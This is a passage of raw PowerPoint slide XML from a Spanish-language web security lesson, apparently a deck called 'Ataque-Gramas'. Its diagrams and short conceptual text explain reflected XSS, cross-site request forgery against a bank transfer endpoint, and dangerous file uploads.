            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1224005"/>
            <a:ext cx="1507951" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>www.evil.mal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04641EE1-A7B0-3E40-9E9A-8D4DEC76DB5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384085" y="1224005"/>
            <a:ext cx="5329165" cy="3539430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="3200" dirty="0"/>
              <a:t>Si un sitio refleja la entrada del usuario tal cual fue ingresada, entonces permite a un atacante el ingresar un script y modificar el funcionamiento original del sitio</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Google Shape;91;p2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41F8DA87-D5D5-1BA2-D3FC-70A657F6F4D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="186475" y="335525"/>
            <a:ext cx="15594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Y" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Ataque-Gramas</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="16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74731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24D94-0DC8-2D4D-A158-1D0F180FE3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8CA89E-F419-4FFA-F12A-81659C981458}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2310230" y="285657"/>
            <a:ext cx="10515600" cy="549275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Cross-Site Request Forgery (CSRF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28D7BF8C-4156-2FAC-0C7D-682F174EDAA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6326839" y="1659285"/>
            <a:ext cx="5329165" cy="3539430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0"/>
              <a:t>Sitios con pedidos sensibles tales como las transferencias bancarias, deben prevenir que dichos pedidos sean escondidos dentro de otros sitios web los cuales puedan ser ejecutados automáticamente por usuarios de ambos sitios.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Google Shape;91;p2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C8B5C9E-2274-1223-1C66-8A1574EC4A07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="186475" y="335525"/>
            <a:ext cx="15594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Y" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Ataque-Gramas</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="382" name="Google Shape;382;p25" descr="Picture 6"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="52999"/>
          </a:blip>
          <a:srcRect l="80810" t="32962" r="2089" b="37636"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1454184" y="1697304"/>
            <a:ext cx="1605450" cy="1950424"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="383" name="Google Shape;383;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352391" y="1353015"/>
            <a:ext cx="1859401" cy="353903"/>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700"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>www.confiable.bien</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="384" name="Google Shape;384;p25" descr="Graphic 16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3771287" y="4635499"/>
            <a:ext cx="952501" cy="952501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="385" name="Google Shape;385;p25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="535996" y="4453504"/>
            <a:ext cx="1315721" cy="2404496"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1315720" cy="2404495"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="386" name="Google Shape;386;p25" descr="Graphic 17"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId5">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="952500" cy="952500"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="387" name="Google Shape;387;p25" descr="Graphic 18"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId6">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="335438" y="183330"/>
              <a:ext cx="952501" cy="952501"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="388" name="Google Shape;388;p25"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="45719" y="1134494"/>
              <a:ext cx="1270001" cy="1270001"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389" name="Google Shape;389;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3817007" y="5547820"/>
            <a:ext cx="959103"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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Atacante</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="390" name="Google Shape;390;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2608086" y="2769472"/>
            <a:ext cx="1429371" cy="2047327"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="21600" h="21600" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="21600" y="21600"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="44450" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="C00000">
                <a:alpha val="61960"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="8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pic>
        <p:nvPicPr>
          <p:cNvPr id="391" name="Google Shape;391;p25" descr="Graphic 34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect r="83694" b="49653"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2199811" y="2310134"/>
            <a:ext cx="573180" cy="726984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="392" name="Google Shape;392;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1736087" y="5126729"/>
            <a:ext cx="2383037" cy="167523"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="21600" h="21600" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="21600"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21600" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="44450" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="385724">
                <a:alpha val="61960"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="8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sp>
        <p:nvSpPr>
          <p:cNvPr id="393" name="Google Shape;393;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2580081" y="4745088"/>
            <a:ext cx="959104"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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>$$$</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="394" name="Google Shape;394;p25" descr="Picture 21"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="69000"/>
          </a:blip>
          <a:srcRect l="80810" t="32962" r="2089" b="37636"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4334734" y="1697301"/>
            <a:ext cx="1605450" cy="1950424"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="395" name="Google Shape;395;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4380455" y="1382145"/>
            <a:ext cx="1859401"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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>www.banco.com</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="396" name="Google Shape;396;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1470677" y="2767749"/>
            <a:ext cx="982772" cy="1979921"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="21600" h="21600" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="21600" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="21600"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="44450" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="385724">
                <a:alpha val="61960"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="8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sp>
        <p:nvSpPr>
          <p:cNvPr id="397" name="Google Shape;397;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2900757" y="2643451"/>
            <a:ext cx="1658610" cy="3"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="21600" h="21600" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="21600" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="21600"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="44450" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="385724">
                <a:alpha val="61960"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="8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sp>
        <p:nvSpPr>
          <p:cNvPr id="398" name="Google Shape;398;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2922717" y="2265958"/>
            <a:ext cx="1859401"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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>/transferMoney</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="535998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ube 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1172C724-7D07-B14A-89BC-78850957D25E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2804246" y="1536188"/>
            <a:ext cx="1300442" cy="1924642"/>
          </a:xfrm>
          <a:prstGeom prst="cube">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47C3C7-1406-1E4B-AA89-63A52DA31801}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2333720" y="326460"/>
            <a:ext cx="9671805" cy="549275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" b="1" dirty="0"/>
              <a:t>Carga de archivo peligroso</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE8D73A4-34F7-BB4F-A702-D68B3A75FFA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2530386" y="1182176"/>
            <a:ext cx="1950840" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>www.file.server</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4242" y="4316493"/>
            <a:ext cx="952500" cy="952500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="24" name="Group 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0143C41B-0369-DF42-8D23-CD96297C5EB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1583179" y="4134499"/>
            <a:ext cx="1428596" cy="1442271"/>
            <a:chOff x="1345136" y="3444526"/>
            <a:chExt cx="1428596" cy="1442271"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="18" name="Graphic 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E9B8A2A-1A9D-7742-A5FF-32C355FA5C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93270576-9AC6-5147-9955-7029A4B44A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6BC41E3C-7C7A-034A-8B7E-41549B3D4C3C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1345136" y="4579020"/>
              <a:ext cx="1428596" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="es-UY" dirty="0"/>
                <a:t>Usuario Común</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84BBC84B-9A44-AD43-915F-EA2939C046D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4045221" y="5250094"/>
            <a:ext cx="1050542" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>Atacante</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29" name="Curved Connector 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{650E4836-B7A8-F74B-A87F-DB491B7EBA63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="17" idx="1"/>
            <a:endCxn id="35" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3218530" y="2899589"/>
            <a:ext cx="875713" cy="1893155"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 126104"/>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640274FF-491E-9140-A9EA-E5F0EA7B72D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>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l="67104" t="53205" r="16432" b="-2165"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3218529" y="2521181"/>
            <a:ext cx="619535" cy="756814"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7DBFE9D-CC97-7A4D-B83A-33E68820F0E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3206557" y="3516135"/>
            <a:ext cx="1137488" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>Web Script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>Malicioso</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Graphic 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02E84624-11C3-934C-A438-3C57C77792E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">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l="16250" t="49342" r="67319" b="229"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3001343" y="1847106"/>
            <a:ext cx="510868" cy="644075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28" name="Curved Connector 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6F4AA0E-AED1-334D-AD3A-CF28E87A322D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="18" idx="0"/>
            <a:endCxn id="23" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="1547709" y="2680865"/>
            <a:ext cx="1965355" cy="941914"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="444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D149F53-C264-AA41-9725-BD5C4D468EB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1332955" y="2136405"/>
            <a:ext cx="1513165" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
